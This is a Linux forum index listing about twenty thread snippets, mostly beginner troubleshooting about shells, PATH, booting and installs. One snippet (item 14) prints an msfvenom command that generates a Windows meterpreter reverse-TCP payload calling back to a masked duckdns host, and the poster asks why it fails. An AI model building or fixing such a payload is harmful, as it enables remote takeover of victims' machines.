
  1. L

    Question ZSH in debian

    Hey guys, let's go. I started messing around with Linux recently, about a week ago. Let me give you an introduction. During this week, I've made a lot of mistakes. I even started a GNU course. I've formatted this notebook I'm using for learning about 14 times. It has an SSD and two 1TB external...
  2. A

    Total file system inode count; Web Server / VPS / Security

    Hi, my first post here and hopefully asking a simple question will get me a simple or reasonably simple answer. Using the Linux terminal how do I determine how many inodes the file system was setup with initially? My server came under inode attack two days ago. I've never heard the phrase...
  3. C

    Solved help asap, cant boot. Debian (LMDE5) LightDM error due to GPU code I need to remove

    dad is starting work in a week and the Desktop is the only thing that can print in the house. need help asap. I was trying to follow turbot's guide for installing drivers for the GPU (RX 6400) and so far he has given OK ish advice, but sometimes given not the best advice. I need help asap, I...
  4. D

    No such file or directroy

    I am using Windows where I have downloaded MobaXterm and in the terminal I am writing a script trying to access an EC2 instance Now, I have downloaded the .pem file (key value pair) and kept it in a folder in (D) drive When I am writing this Permission denied part I have got it but why the...
  5. J

    Moving a file from another system on the same drive?

    Hello, can there be a designation with getting from <~> any of the rest directories when moving a file to </home> from another primary system? For example some official website indicates how to save a file to a Linux primary system e.g. <~/.local/> and so on, but when the file is moved from...
  6. J

    On WSL by terminal

    Hi, recently in a sub-systemLinux terminal for setting up drivers, cat/proc/version did not match its report of gcc version with the report of gcc -v; in fact, gcc -v did not detect anything to start with and offered to download one, which was different as in values of 11.xx.x and 9.xx.x . Now...
  7. A

    What’s the difference between bash and default terminal?

    I am very very new to Linux, and when I’m installing anaconda, I noticed that the conda command can only be used after I type “bash” and start using the bash console. What’s the difference between bash and the default terminal?
  8. A

    Fresh Arch Install: Can no longer clone from AUR

    Yesterday, I installed Arch, and I managed to successfully install a few packages (Zoom, among them) from the AUR. Note I shutdown and restarted my computer successfully a few times yesterday, and I managed to install all the packages from the AUR after my initial session on Arch But today, I...
  9. SpongeB0B

    [Solved] how launch a interactive terminal for an user from .profile

    Hi everyone, I was looking how to Launch command once at login per user. This is now working thanks to @NorthWest But I would like to launch for the user a terminal to change his password like this -> xfce4-terminal -e 'passwd' from a script that is being called from ~/.profile see: Launch...
  10. L

    Terminal shows a warning while installing: Not on PATH - how to fix? (SOLVED)

    I am trying to install "youtube-dl" and this warning is shown in my command line: WARNING: The script youtube-dl is installed in '/home/linuxmint/.local/bin' which is not on PATH. Consider adding this directory to PATH or, if you prefer to suppress this warning, use --no-warn-script-location...
  11. smooth_buddha

    What terminal emulator do you use?

    Im currently using a teminal emulator called "Terminology" its quite fun and customziable. I discovered it by using Bodhi linux, that distro has terminology as default terminal
  12. Adithyansm

    How to get an autocompletion in terminal Zorin bash shell [SOLVED]

    I have been using and learning kali for a couple of months and am used to its terminal. Like it will show a preview of previously typed command and we can use arrow keys to type the whole command and now I am using Zorin (Xfce) bash shell and missing that feature very much. Is there any way...
  13. L

    $PATH is not set properly

    Hi, I am using Ubuntu 64-bit on a VM and installed an app, added it to $PATH using export PATH=$PWD/bin:$PATH in my terminal (T1). Worked fine. Then i wanted to use the command in another terminal (T2) and got an error message that the command is unknown (exactly that, no more information). I...
  14. D

    Permission Denied

    I need help. when i write this code i can't access desktop. msfvenom -p windows/meterpreter/reverse_tcp_dns LHOST=****.duckdns.org LPORT=**** -f exe > /root/Desktop/maceradg.exe sh: 1: cannot create /root/Desktop/maceradg.exe: Permission denied
  15. D

    recon-ng returning "invalid nameserver" error

    I was taking a course on ethical hacking where I came across a problem on running a tool on linux kali. In the video I saw the user use recon-ng to get info on a particular site but when I followed the exact steps I get the following error: [!] invalid nameserver. I'm typing below all the...
  16. D

    recon-ng returning "invalid nameserver" error

    I was taking a course on ethical hacking where I came across a problem on running a tool on linux kali. In the video I saw the user use recon-ng to get info on a particular site but when I followed the exact steps I get the following error: [!] invalid nameserver. I'm typing below all the...
  17. F

    [Solved] Running .Appimage files

    Hi, I've recently downloaded Linux for the first time on my Chromebook and i'm trying to install unity hub. The problem is the downloaded file is in the .AppImage format which i can't run. I did some research and found out you have to make it executable with the command "chmod +x...
  18. S

    (Solved) - Elementary OS Installation Issues

    I just downloaded elementary OS a few hours ago. Managed to fix them thanks to a 54 year old gentleman from my previous thread. But now i have a new issue. I watched a video on YouTube from average linux user. In that he details 15 things you can do to make the OS better. But i dont know how to...
  19. D

    nvm solved

    ... I don't know how to delete a post
  20. U

    hey, I'd like to become "that guy" who only boots up windows on virtual machines to play games while using mainly linux...

    problem is. I don't know where to start or what to learn. the terminal? which distro should I start with and which one should I end on? obviously all this sounds very generic and over-asked, yet I'd like to clarify that I had prior experience with linux. Pop!_OS in particular, I used it for...